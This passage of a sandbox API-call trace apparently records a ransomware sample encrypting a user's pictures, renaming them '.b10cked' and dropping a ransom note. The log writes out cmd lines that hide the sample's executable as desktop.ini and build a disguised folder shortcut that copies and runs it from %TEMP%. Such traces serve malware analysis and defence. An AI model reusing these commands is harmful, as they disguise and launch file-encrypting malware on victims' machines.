hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0143.327] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0143.327] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x6789, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x6789, lpOverlapped=0x0) returned 1 [0143.328] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0143.328] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x6789, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x6789, lpOverlapped=0x0) returned 1 [0143.328] SetFilePointer (in: hFile=0x114, lDistanceToMove=-26505, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x678c [0143.328] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x6789, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x6789, lpOverlapped=0x0) returned 1 [0143.328] SetFilePointer (in: hFile=0x114, lDistanceToMove=-26505, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x678c [0143.328] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x6789, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x6789, lpOverlapped=0x0) returned 1 [0143.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEJhG5emgLWHUyVz.jpg", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 
lpUsedDefaultChar=0x0) returned 20 [0143.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEJhG5emgLWHUyVz.jpg", cchWideChar=20, lpMultiByteStr=0x13286f4, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEJhG5emgLWHUyVz.jpg", lpUsedDefaultChar=0x0) returned 20 [0143.333] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xcf15 [0143.333] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0143.333] CloseHandle (hObject=0x114) returned 1 [0143.334] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\EEJhG5emgLWHUyVz.jpg", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJHG5~1.JPG") returned 0x38 [0143.335] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\") returned 0x2c [0143.335] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJHG5~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJhG5emgLWHUyVz.jpg.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), 
lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJHG5~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJhG5emgLWHUyVz.jpg.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0x6dc, dwThreadId=0xffc)) returned 1 [0143.337] CloseHandle (hObject=0x110) returned 1 [0143.337] CloseHandle (hObject=0x114) returned 1 [0143.337] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\", cchLength=0x3a | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\J4M1CX OC5JPL3U0YC\\") returned 0x3a [0143.337] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\") returned 0x1a [0143.337] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\J4M1CX OC5JPL3U0YC\\", cchCount1=58, lpString2="C:\\USERS\\EEBSYM5\\PICTURES\\", cchCount2=26) returned 3 [0143.337] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\", cchLength=0x3a | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\J4M1CX OC5JPL3U0YC\\") returned 0x3a [0143.337] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0143.338] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\J4M1CX OC5JPL3U0YC\\", cchCount1=58, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0143.338] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0143.338] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 
0x20 [0143.338] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0143.338] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\") returned 0x2c [0143.338] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0143.338] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0143.338] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0x80c, dwThreadId=0xfcc)) returned 1 [0143.340] CloseHandle (hObject=0x110) returned 1 [0143.340] CloseHandle (hObject=0x114) returned 1 [0143.340] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2rewelj\\j4m1cx 
oc5jpl3u0yc\\bl0cked-readme.rtf")) returned 0xffffffff [0143.340] GetLastError () returned 0x2 [0143.340] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2rewelj\\j4m1cx oc5jpl3u0yc\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0143.342] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2rewelj\\j4m1cx oc5jpl3u0yc\\bl0cked-readme.rtf")) returned 0x20 [0143.343] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0143.343] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0143.343] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0143.343] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0143.343] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0143.343] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0143.343] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb 
[0143.343] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\") returned 0x2c [0143.343] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0143.343] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0143.343] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC", lpszShortPath=0x123003c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1") returned 0x2b [0143.344] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x16a | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2~1\\J4M1CX~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2~1\\J4M1CX~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2~1\\J4M1CX~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2~1\\J4M1CX~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x16a [0143.344] CharUpperBuffW (in: 
lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0143.344] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x110, dwProcessId=0xfdc, dwThreadId=0x85c)) returned 1 [0143.381] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0144.531] CloseHandle (hObject=0x114) returned 1 [0144.531] CloseHandle (hObject=0x110) returned 1 [0144.531] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) 
returned 2 [0144.531] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0144.531] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0144.531] GetTickCount () returned 0x2d181 [0144.531] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=20132042061) returned 1 [0144.531] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6c\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0144.531] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x36\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0144.531] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x58\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0144.531] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x5a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0144.531] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x68\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0144.531] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x71\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0144.531] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, 
lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4b\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0144.531] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4f\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0144.531] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0144.531] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0144.531] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0144.532] CharUpperBuffW (in: lpsz="explorer.exe \"j4m1cX oc5jpl3U0YC\" & type \"j4m1cX oc5jpl3U0YC\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x75 | out: lpsz="EXPLORER.EXE \"J4M1CX OC5JPL3U0YC\" & TYPE \"J4M1CX OC5JPL3U0YC\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x75 [0144.532] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0144.532] CharUpperBuffW (in: lpsz="explorer.exe \"j4m1cX oc5jpl3U0YC\" & type \"j4m1cX oc5jpl3U0YC\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x76 | out: lpsz="EXPLORER.EXE \"J4M1CX OC5JPL3U0YC\" & TYPE \"J4M1CX OC5JPL3U0YC\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x76 [0144.532] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0144.532] CoInitialize (pvReserved=0x0) returned 0x0 [0144.532] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, 
Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0144.533] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0144.533] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0144.533] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0144.534] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"j4m1cX oc5jpl3U0YC\" & type \"j4m1cX oc5jpl3U0YC\\desktop.ini\" > \"%TEMP%\\l6XZhqKO.exe\" && \"%TEMP%\\l6XZhqKO.exe\"") returned 0x0 [0144.534] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0144.534] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0144.535] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0144.535] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC.lnk", fRemember=0) returned 0x0 [0144.541] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0144.541] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0144.541] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0144.541] CoUninitialize () [0144.542] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0144.542] ReleaseMutex 
(hMutex=0xf8) returned 1 [0144.542] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0144.542] ReleaseMutex (hMutex=0xf8) returned 1 [0144.542] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0144.542] ReleaseMutex (hMutex=0xf8) returned 1 [0144.542] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0144.542] ReleaseMutex (hMutex=0xf8) returned 1 [0144.542] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\qgVefxhoS8T3s19q574.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2rewelj\\j4m1cx oc5jpl3u0yc\\qgvefxhos8t3s19q574.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0144.542] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.542] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x383a [0144.542] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.542] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=20133153310) returned 1 [0144.542] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.542] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x383a [0144.542] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.542] SetFilePointer (in: 
